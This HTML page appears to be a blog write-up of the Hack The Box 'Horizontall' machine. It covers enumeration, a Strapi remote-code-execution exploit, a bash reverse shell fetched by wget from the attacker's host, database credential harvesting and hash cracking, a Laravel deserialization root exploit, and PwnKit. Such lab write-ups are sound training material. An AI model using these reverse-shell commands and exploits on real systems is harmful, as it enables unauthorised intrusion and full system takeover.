<!doctype html><html lang=en dir=auto>
<head><meta charset=utf-8>
<meta http-equiv=x-ua-compatible content="IE=edge">
<meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no">
<meta name=robots content="index, follow">
<title>Hack The Box - Horizontall | Hakune Blog</title>
<meta name=keywords content="ctf,tech,htb">
<meta name=description content="Write up for Hack The Box&rsquo;s Horizontall machine">
<meta name=author content="Aki Hakune">
<link rel=canonical href=https://git-akihakune.github.io>
<link crossorigin=anonymous href=/assets/css/stylesheet.min.189a63b85d2e4ae9611de9bef28f822f81e0e419a940f31638378cf24b05fb68.css integrity="sha256-GJpjuF0uSulhHem+8o+CL4Hg5BmpQPMWODeM8ksF+2g=" rel="preload stylesheet" as=style>
<link rel=preload href=/static/banner.png as=image>
<script defer crossorigin=anonymous src=/assets/js/highlight.min.7680afc38aa6b15ddf158a4f3780b7b1f7dde7e91d26f073e6229bb7a0793c92.js integrity="sha256-doCvw4qmsV3fFYpPN4C3sffd5+kdJvBz5iKbt6B5PJI=" onload=hljs.initHighlightingOnLoad()></script>
<link rel=icon href=https://git-akihakune.github.io/favicon.ico>
<link rel=icon type=image/png sizes=16x16 href=https://git-akihakune.github.io/favicon.ico>
<link rel=icon type=image/png sizes=32x32 href=https://git-akihakune.github.io/favicon.ico>
<link rel=apple-touch-icon href=https://git-akihakune.github.io/favicon.ico>
<link rel=mask-icon href=https://git-akihakune.github.io/favicon.ico>
<meta name=theme-color content="#2e2e33">
<meta name=msapplication-TileColor content="#2e2e33">
<meta name=generator content="Hugo 0.92.1">
<link rel=alternate hreflang=en href=https://git-akihakune.github.io/blog/horizontall/>
<link rel=alternate hreflang=vi href=https://git-akihakune.github.io/vi/blog/horizontall/>
<noscript>
<style>#theme-toggle,.top-link{display:none}</style>
</noscript><link rel=manifest href=/hakune.webmanifest>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-F8M24PKNWZ"></script>
<script>var doNotTrack=!1;if(!doNotTrack){window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments)}gtag('js',new Date),gtag('config','G-F8M24PKNWZ',{anonymize_ip:!1})}</script>
<meta property="og:title" content="Hack The Box - Horizontall">
<meta property="og:description" content="Write up for Hack The Box&rsquo;s Horizontall machine">
<meta property="og:type" content="article">
<meta property="og:url" content="https://git-akihakune.github.io/blog/horizontall/">
<meta property="og:image" content="https://git-akihakune.github.io/img/horizontall/horizontall.jpg"><meta property="article:section" content="blog">
<meta property="article:published_time" content="2022-02-03T20:41:31+07:00">
<meta property="article:modified_time" content="2022-02-03T20:41:31+07:00"><meta property="og:site_name" content="Hakune Blog">
<meta name=twitter:card content="summary_large_image">
<meta name=twitter:image content="https://git-akihakune.github.io/img/horizontall/horizontall.jpg">
<meta name=twitter:title content="Hack The Box - Horizontall">
<meta name=twitter:description content="Write up for Hack The Box&rsquo;s Horizontall machine">
<script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":2,"name":"Blogs","item":"https://git-akihakune.github.io/blog/"},{"@type":"ListItem","position":3,"name":"Hack The Box - Horizontall","item":"https://git-akihakune.github.io/blog/horizontall/"}]}</script>
<script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","headline":"Hack The Box - Horizontall","name":"Hack The Box - Horizontall","description":"Write up for Hack The Box\u0026rsquo;s Horizontall machine","keywords":["ctf","tech","htb"],"articleBody":"I. Scanning First things first, as per usual, a nmap scan:\n# Nmap 7.92 scan initiated Fri Jan 14 02:48:59 2022 as: nmap -sC -sV -oN nmap.txt 10.10.11.105 Nmap scan report for 10.10.11.105 Host is up (0.039s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA) | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA) |_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Did not follow redirect to http://horizontall.htb Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jan 14 02:49:13 2022 -- 1 IP address (1 host up) scanned in 13.50 seconds Notice this line?\nhttp-title: Did not follow redirect to http://horizontall.htb So we have to add an additional entry to our /etc/hosts file, something like this:\n10.10.11.105 horizontall.htb Rerun nmap again, and here’s the result:\n# Nmap 7.92 scan initiated Fri Jan 14 02:59:54 2022 as: nmap -sC -sV -oN nmap.txt 10.10.11.105 Nmap scan report for horizontall.htb (10.10.11.105) Host is up (0.042s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA) | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA) |_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: horizontall Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jan 14 03:00:05 2022 -- 1 IP address (1 host up) scanned in 10.60 seconds A full port scan also didn’t reveal anything, so i manually opened it in a browser: Nothing was clickable. Also, here’s what gobuster returned us:\n$ gobuster dir -r -u http://horizontall.htb -o gobuster.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) \u0026 Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://horizontall.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2022/01/14 03:18:57 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 403) [Size: 178] /css (Status: 403) [Size: 178] /js (Status: 403) [Size: 178] =============================================================== 2022/01/14 03:25:24 Finished =============================================================== Nothing new, isn’t it? I also check the javascript source code but seems like nothing novel showed up.\nAt this point, I remembered a small ctf trick - if the challenge calls for any amendment in /etc/hosts file, the answer must lie somewhere among the subdomains. Therefore, I set up a subdomain fuzzer like this:\nwfuzz --oF wfuzz -c -f wfuzz.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u \"http://horizontall.htb\" -H \"Host: FUZZ.horizontall.htb\" --hc 301 And it perfectly worked:\n$ wfuzz --oF wfuzz -c -f wfuzz.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u \"http://horizontall.htb\" -H \"Host: FUZZ.horizontall.htb\" --hc 301 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://horizontall.htb/ Total requests: 114441 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 200 1 L 43 W 901 Ch \"www\" 000047093: 200 19 L 33 W 413 Ch \"api-prod\" Total time: 641.3004 Processed Requests: 114441 Filtered Requests: 114439 Requests/sec.: 178.4514 Takes about 10 minutes with a mediocre virtual machine. However, we have found a new attack surface - that api-prod endpoint.\nBut all else aside, we must add that enpoint to our /etc/hosts file first.\n10.10.11.105 api-prod.horizontall.htb II. API attack Upon opening that endpoint in a browser, here’s what we have: Well, thanks I guess?\nWe will follow the exact same procedure for the new API endpoint. Here is the Gobuster result:\n/reviews (Status: 200) [Size: 507] /users (Status: 403) [Size: 60] /admin (Status: 200) [Size: 854] /Reviews (Status: 200) [Size: 507] /Users (Status: 403) [Size: 60] /Admin (Status: 200) [Size: 854] /REVIEWS (Status: 200) [Size: 507] /%C0 (Status: 400) [Size: 69] /%C0~ (Status: 400) [Size: 69] /%C0.bak (Status: 400) [Size: 69] /%C0.bak2 (Status: 400) [Size: 69] /%C0.old (Status: 400) [Size: 69] /%C0.1 (Status: 400) [Size: 69] /.%C0.swp (Status: 400) [Size: 69] As you can see, there are many interesting things to check here. But first, let’s get to /admin endpoint.\n So the technology behind is strapi. A quick searchsploit result revealed a critical RCE vulnerability.\n$ searchsploit strapi ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results Choose one that you like, then simply execute it. Here, I used 50239.py:\n$ python3 50239.py http://api-prod.horizontall.htb [+] Checking Strapi CMS Version running [+] Seems like the exploit will work!!! [+] Executing exploit [+] Password reset was successfully [+] Your email is: admin@horizontall.htb [+] Your new credentials are: admin:SuperStrongPassword1 [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQzODc3NTg2LCJleHAiOjE2NDY0Njk1ODZ9.p_uvCIHcKXwruPv8na6MVpU-aLInNKphFDvOh7zYs5U $ However, running a command resulted in an error:\n$ id [+] Triggering Remote code executin [*] Rember this is a blind RCE do not expect to see output {\"statusCode\":400,\"error\":\"Bad Request\",\"message\":[{\"messages\":[{\"id\":\"An error occurred\"}]}]} At first I was doubtful about some shoddy programming. However, it really did successfully make a call back. Therefore, I spinned up an one liner reverse shell like this:\n#!/bin/sh  sh -i \u0026 /dev/tcp/10.10.16.13/9000 0\u00261 And download it to target machine.\n$ wget 10.10.16.13/rv.sh [+] Triggering Remote code executin [*] Rember this is a blind RCE do not expect to see output {\"statusCode\":400,\"error\":\"Bad Request\",\"message\":[{\"messages\":[{\"id\":\"An error occurred\"}]}]} We can clearly see it was successfully transferred from our attacking machine:\n$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.105 - - [03/Feb/2022 03:55:37] \"GET /rv.sh HTTP/1.1\" 200 - And upon triggering the script:\n$ bash rv.sh [+] Triggering Remote code executin [*] Rember this is a blind RCE do not expect to see output We got a reverse shell:\n$ nc -lvnp 9000 listening on [any] 9000 ... connect to [10.10.16.13] from (UNKNOWN) [10.10.11.105] 43566 sh: 0: can't access tty; job control turned off $ id uid=1001(strapi) gid=1001(strapi) groups=1001(strapi) III. User flag After a 5-second recon, I relized that strapi user had sufficient permission to read the user flag at /home/developer/user.txt.\n$ ls /home developer $ cd /home/developer $ ls -al total 108 drwxr-xr-x 8 developer developer 4096 Aug 2 2021 . drwxr-xr-x 3 root root 4096 May 25 2021 .. lrwxrwxrwx 1 root root 9 Aug 2 2021 .bash_history - /dev/null -rw-r----- 1 developer developer 242 Jun 1 2021 .bash_logout -rw-r----- 1 developer developer 3810 Jun 1 2021 .bashrc drwx------ 3 developer developer 4096 May 26 2021 .cache -rw-rw---- 1 developer developer 58460 May 26 2021 composer-setup.php drwx------ 5 developer developer 4096 Jun 1 2021 .config drwx------ 3 developer developer 4096 May 25 2021 .gnupg drwxrwx--- 3 developer developer 4096 May 25 2021 .local drwx------ 12 developer developer 4096 May 26 2021 myproject -rw-r----- 1 developer developer 807 Apr 4 2018 .profile drwxrwx--- 2 developer developer 4096 Jun 4 2021 .ssh -r--r--r-- 1 developer developer 33 Feb 3 08:06 user.txt lrwxrwxrwx 1 root root 9 Aug 2 2021 .viminfo - /dev/null Or, to be precise, anyone on the box can read that user.txt file. Just cat it out and we got the user flag.\nIV. Privilege Escalation Or a seem-very-real rabbit hole that I felt into. If you are not interested, you can jump to real privilege escalation section.\nHere’s the starting point of a miserable failure:\n$ uname -a Linux horizontall 4.15.0-154-generic #161-Ubuntu SMP Fri Jul 30 13:04:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux And we can find so many “potential” payloads with just that information.\n$ searchsploit linux kernel 4.15.0 130 ⨯ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Linux Kernel (Solaris 10 / ) - Local Privilege Escalation | solaris/local/15962.c Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c Linux Kernel 2.6.19 'Netfilter Local Privilege Escalation | linux/local/50135.c Linux Kernel 4.10 PTRACE_TRACEME' pkexec Local Privilege Escalation | linux/local/47163.c Linux Kernel 4.15.x map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method) | linux/local/47164.sh Linux Kernel 4.15.x map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method) | linux/local/47165.sh Linux Kernel 4.15.x map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method) | linux/local/47166.sh Linux Kernel 4.15.x map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method) | linux/local/47167.sh Linux Kernel 4.8.0 UDEV Linux Kernel show_floppy' KASLR Address Leak | linux/local/44325.c Linux Kernel ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt Linux Kernel AF_LLC' Double Free | linux/dos/44579.c ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results After wasting an hour of mine to “trial and error” most of those exploits, I came to a painful conclusion that these are no use in this case.\nV. Real privilege escalation - if only Things got back to their right tracks after I crawled out of that rabbit hole. At least, that’s what I want to say, but no.\nIt all started from this list of opening ports:\n$ ss -lntup Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port tcp LISTEN 0 128 127.0.0.1:8000 0.0.0.0:* tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 128 127.0.0.1:1337 0.0.0.0:* users:((\"node\",pid=1750,fd=31)) tcp LISTEN 0 128 [::]:80 [::]:* tcp LISTEN 0 128 [::]:22 [::]:* In my opinion, that 1337 port seems extremely suspicious. However, after a bit of SSH tunneling, I realized that it was only the API endpoint that we discovered earlier.\nOn the other hand, that port 3306 was the real culprit.\nHere is another very useful command that turned out to be a menace this time:\n$ grep -Rnw -e \"password\" environments/production/database.json:13: \"password\": \"${process.env.DATABASE_PASSWORD || ''}\", environments/development/database.json:12: \"password\": \"#J!:F9Zt2u\" environments/staging/database.json:13: \"password\": \"${process.env.DATABASE_PASSWORD || ''}\", Without a second thought, I instantly cat out that development/database.json file.\n{ \"defaultConnection\": \"default\", \"connections\": { \"default\": { \"connector\": \"strapi-hook-bookshelf\", \"settings\": { \"client\": \"mysql\", \"database\": \"strapi\", \"host\": \"127.0.0.1\", \"port\": 3306, \"username\": \"developer\", \"password\": \"#J!:F9Zt2u\" }, \"options\": {} } } } Little did I know, all these very legit credentials are traps. I happily connected to the database, browsing around a bit, and eventually got something really promising.\n$ mysql -h 127.0.0.1 -P 3306 -u developer -p strapi --password=\"#J!:F9Zt2u\" -e \"SELECT * FROM strapi_administrator\" mysql: [Warning] Using a password on the command line interface can be insecure. id username email password resetPasswordToken blocked 3 admin admin@horizontall.htb $2a$10$Z/5DNUBoQeb0hOBmD3mlous9fju9gK3FEGOVKoe.XRw4TNCTgjqu. NULL NULL I went through hell to crack that password, only to belatedly realize that the hash was notoriously hard to brute force due to its high hashing time. Nevertheless, I managed to crack it.\nadmin\tSuperStrongPassword1 Why does this password sounds peculiarly familiar…\nA flashback suddenly dawned on me - it was the dummy admin account that our strapi exploit script made from start! All those work, were in vain… What a memorable experience.\nVI. Real privilege escalation There still is another strange opening port - port 8000. After another bit of port forwarding:\nssh -i key/id_rsa -L 9999:127.0.0.1:8000 strapi@horizontall.htb Then access it through localhost:9999, we get a fresh Laravel page. Notice this small line in the bottom right corner?\nLaravel v8 (PHP v7.4.18) Several vulnerabilities were found in no time:\n$ searchsploit laravel 8 ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection | php/webapps/50538.txt Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) | php/webapps/50525.txt UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read | php/webapps/48166.txt UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload | php/webapps/46389.py ------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Mostly are Python 3 exploits. We can do port forwarding, or directly load the exploit to the server. However, given that the server has Python3:\nstrapi@horizontall:~$ python3 -V Python 3.6.9 The latter seems better. However…\nstrapi@horizontall:~$ python3 rt.py http://127.0.0.1:8000 /var/www/html/laravel/storage/logs/laravel.log 'whoami' Exploit... Traceback (most recent call last): File \"/usr/lib/python3/dist-packages/urllib3/connectionpool.py\", line 601, in urlopen chunked=chunked) File \"/usr/lib/python3/dist-packages/urllib3/connectionpool.py\", line 387, in _make_request six.raise_from(e, None) File \"\", line 3, in raise_from File \"/usr/lib/python3/dist-packages/urllib3/connectionpool.py\", line 383, in _make_request httplib_response = conn.getresponse() File \"/usr/lib/python3.6/http/client.py\", line 1373, in getresponse response.begin() File \"/usr/lib/python3.6/http/client.py\", line 311, in begin version, status, reason = self._read_status() File \"/usr/lib/python3.6/http/client.py\", line 280, in _read_status raise RemoteDisconnected(\"Remote end closed connection without\" http.client.RemoteDisconnected: Remote end closed connection without response … the exploit refused to work… And thus, a quick search led me to a year old Github repo.\nstrapi@horizontall:~$ python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 id [i] Trying to clear logs [+] Logs cleared [+] PHPGGC found. Generating payload and deploy it to the target [+] Successfully converted logs to PHAR [+] PHAR deserialized. Exploited uid=0(root) gid=0(root) groups=0(root) [i] Trying to clear logs [+] Logs cleared This time, it worked perfectly. Hence, dive into the real thing, let’s copy /bin/bash to some other directory, change its owner and set SUID permission for it.\nstrapi@horizontall:~$ cp /bin/bash ~ strapi@horizontall:~$ python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 \"chown root:root /opt/strapi/bash; chmod +s /opt/strapi/bash\" [i] Trying to clear logs [+] Logs cleared [+] PHPGGC found. Generating payload and deploy it to the target [+] Successfully converted logs to PHAR [i] There is no output [i] Trying to clear logs [+] Logs cleared And just like that, we now have root access.\nstrapi@horizontall:~$ ls bash myapi strapi@horizontall:~$ ./bash -p bash-4.4# id uid=1001(strapi) gid=1001(strapi) euid=0(root) egid=0(root) groups=0(root),1001(strapi) VII. Extra For the time of writing (nearly 5 months after the box release), there’s another novel, safe and reliable method to get root access via CVE-2021-4034. This is probably not intentional, but it worked nonetheless.\nFrom our attacker machine:\nwget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.zip -O polkit.zip Load that to server machine, make it there, and get root.\nstrapi@horizontall:~$ wget http://10.10.16.13/polkit.zip --2022-02-03 12:55:45-- http://10.10.16.13/polkit.zip Connecting to 10.10.16.13:80... connected. HTTP request sent, awaiting response... l200 OK Length: 6457 (6.3K) [application/zip] Saving to: ‘polkit.zip’ polkit.zip 100%[===============================================] 6.31K --.-KB/s in 0.04s 2022-02-03 12:55:45 (175 KB/s) - ‘polkit.zip’ saved [6457/6457] strapi@horizontall:~$ unzip polkit.zip Archive: polkit.zip 55d60e381ef90463ed35f47af44bf7e2fbc150d4 creating: CVE-2021-4034-main/ inflating: CVE-2021-4034-main/.gitignore inflating: CVE-2021-4034-main/LICENSE inflating: CVE-2021-4034-main/Makefile inflating: CVE-2021-4034-main/README.md inflating: CVE-2021-4034-main/cve-2021-4034.c inflating: CVE-2021-4034-main/cve-2021-4034.sh creating: CVE-2021-4034-main/dry-run/ inflating: CVE-2021-4034-main/dry-run/Makefile inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c inflating: CVE-2021-4034-main/pwnkit.c strapi@horizontall:~$ cd CVE-2021-4034-main/ strapi@horizontall:~/CVE-2021-4034-main$ make cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cc -Wall cve-2021-4034.c -o cve-2021-4034 echo \"module UTF-8// PWNKIT// pwnkit 1\"  gconv-modules mkdir -p GCONV_PATH=. cp -f /bin/true GCONV_PATH=./pwnkit.so:. strapi@horizontall:~/CVE-2021-4034-main$ ls cve-2021-4034 cve-2021-4034.sh gconv-modules LICENSE pwnkit.c README.md cve-2021-4034.c dry-run 'GCONV_PATH=.' Makefile pwnkit.so strapi@horizontall:~/CVE-2021-4034-main$ ./cve-2021-4034 # id uid=0(root) gid=0(root) groups=0(root),1001(strapi) Very simple and reliable.\nFinal words And that’s it. No special technique - this machine just runs slightly outdated softwares. The lesson can be drawn from this box is to think carefully before dive into rabbit holes and update your machine as soon as security patches come out!\n","wordCount":"2471","inLanguage":"en","image":"https://git-akihakune.github.io/img/horizontall/horizontall.jpg","datePublished":"2022-02-03T20:41:31+07:00","dateModified":"2022-02-03T20:41:31+07:00","author":[{"@type":"Person","name":"Aki Hakune"}],"mainEntityOfPage":{"@type":"WebPage","@id":"https://git-akihakune.github.io/blog/horizontall/"},"publisher":{"@type":"Organization","name":"Hakune Blog","logo":{"@type":"ImageObject","url":"https://git-akihakune.github.io/favicon.ico"}}}</script>
</head>
<body class=dark id=top>
<script>localStorage.getItem("pref-theme")==="light"&&document.body.classList.remove('dark')</script>
<header class=header>
<nav class=nav>
<div class=logo>
<a href=https://git-akihakune.github.io accesskey=h title="Blog (Alt + H)">
<img src=/static/banner.png alt=logo aria-label=logo height=40>Blog</a>
<span class=logo-switches>
<button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg>
</button>
<ul class=lang-switch><li>|</li>
<li>
<a href=https://git-akihakune.github.io/vi/ title=Vi aria-label=Vi>Vi</a>
</li>
</ul>
</span>
</div>
<ul id=menu>
<li>
<a href=https://git-akihakune.github.io/archive/ title=archive>
<span>archive</span>
</a>
</li>
<li>
<a href=https://git-akihakune.github.io/blog/ title=blog>
<span>blog</span>
</a>
</li>
<li>
<a href=https://git-akihakune.github.io/search/ title="search (Alt + /)" accesskey=/>
<span>search</span>
</a>
</li>
<li>
<a href=https://git-akihakune.github.io/tags/ title=tags>
<span>tags</span>
</a>
</li>
</ul>
</nav>
</header>
<main class=main>
<article class=post-single>
<header class=post-header>
<div class=breadcrumbs><a href=https://git-akihakune.github.io>Home</a>&nbsp;»&nbsp;<a href=https://git-akihakune.github.io/blog/>Blogs</a></div>
<h1 class=post-title>
Hack The Box - Horizontall
</h1>
<div class=post-meta><span title="2022-02-03 20:41:31 +0700 +07">February 3, 2022</span>&nbsp;·&nbsp;12 min&nbsp;·&nbsp;Aki Hakune&nbsp;|&nbsp;
<ul class=i18n_list>Translations:
<li>
<a href=https://git-akihakune.github.io/vi/blog/horizontall/>Vi</a>
</li>
</ul>&nbsp;|&nbsp;<a href=https://github.com/git-akihakune/git-akihakune.github.io/tree/main/ rel="noopener noreferrer" target=_blank>Suggest Changes</a>
</div>
</header>
<figure class=entry-cover><img loading=lazy src=https://git-akihakune.github.io/img/horizontall/horizontall.jpg alt="Hack The Box Horizontall">
<p>Hack The Box - Horizontall</p>
</figure><div class=toc>
<details>
<summary accesskey=c title="(Alt + C)">
<span class=details>Table of Contents</span>
</summary>
<div class=inner><ul>
<li>
<a href=#i-scanning aria-label="I. Scanning">I. Scanning</a></li>
<li>
<a href=#ii-api-attack aria-label="II. API attack">II. API attack</a></li>
<li>
<a href=#iii-user-flag aria-label="III. User flag">III. User flag</a></li>
<li>
<a href=#iv-privilege-escalation aria-label="IV. Privilege Escalation">IV. Privilege Escalation</a></li>
<li>
<a href=#v-real-privilege-escalation---if-only aria-label="V. Real privilege escalation - if only">V. Real privilege escalation - if only</a></li>
<li>
<a href=#vi-real-privilege-escalation aria-label="VI. Real privilege escalation">VI. Real privilege escalation</a></li>
<li>
<a href=#vii-extra aria-label="VII. Extra">VII. Extra</a></li>
<li>
<a href=#final-words aria-label="Final words">Final words</a>
</li>
</ul>
</div>
</details>
</div>
<div class=post-content><h2 id=i-scanning>I. Scanning<a hidden class=anchor aria-hidden=true href=#i-scanning>#</a></h2>
<p>First things first, as per usual, a nmap scan:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=color:#75715e># Nmap 7.92 scan initiated Fri Jan 14 02:48:59 2022 as: nmap -sC -sV -oN nmap.txt 10.10.11.105</span>
Nmap scan report <span style=color:#66d9ef>for</span> 10.10.11.105
Host is up <span style=color:#f92672>(</span>0.039s latency<span style=color:#f92672>)</span>.
Not shown: <span style=color:#ae81ff>998</span> closed tcp ports <span style=color:#f92672>(</span>conn-refused<span style=color:#f92672>)</span>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 <span style=color:#f92672>(</span>Ubuntu Linux; protocol 2.0<span style=color:#f92672>)</span>
| ssh-hostkey: 
|   <span style=color:#ae81ff>2048</span> ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 <span style=color:#f92672>(</span>RSA<span style=color:#f92672>)</span>
|   <span style=color:#ae81ff>256</span> 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 <span style=color:#f92672>(</span>ECDSA<span style=color:#f92672>)</span>
|_  <span style=color:#ae81ff>256</span> 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 <span style=color:#f92672>(</span>ED25519<span style=color:#f92672>)</span>
80/tcp open  http    nginx 1.14.0 <span style=color:#f92672>(</span>Ubuntu<span style=color:#f92672>)</span>
|_http-server-header: nginx/1.14.0 <span style=color:#f92672>(</span>Ubuntu<span style=color:#f92672>)</span>
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
<span style=color:#75715e># Nmap done at Fri Jan 14 02:49:13 2022 -- 1 IP address (1 host up) scanned in 13.50 seconds</span>
</code></pre></div><p>Notice this line?</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>http-title: Did not follow redirect to http://horizontall.htb
</code></pre></div><p>So we have to add an additional entry to our <code>/etc/hosts</code> file, something like this:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>10.10.11.105    horizontall.htb
</code></pre></div><p>Rerun <code>nmap</code> again, and here&rsquo;s the result:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=color:#75715e># Nmap 7.92 scan initiated Fri Jan 14 02:59:54 2022 as: nmap -sC -sV -oN nmap.txt 10.10.11.105</span>
Nmap scan report <span style=color:#66d9ef>for</span> horizontall.htb <span style=color:#f92672>(</span>10.10.11.105<span style=color:#f92672>)</span>
Host is up <span style=color:#f92672>(</span>0.042s latency<span style=color:#f92672>)</span>.
Not shown: <span style=color:#ae81ff>998</span> closed tcp ports <span style=color:#f92672>(</span>conn-refused<span style=color:#f92672>)</span>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 <span style=color:#f92672>(</span>Ubuntu Linux; protocol 2.0<span style=color:#f92672>)</span>
| ssh-hostkey: 
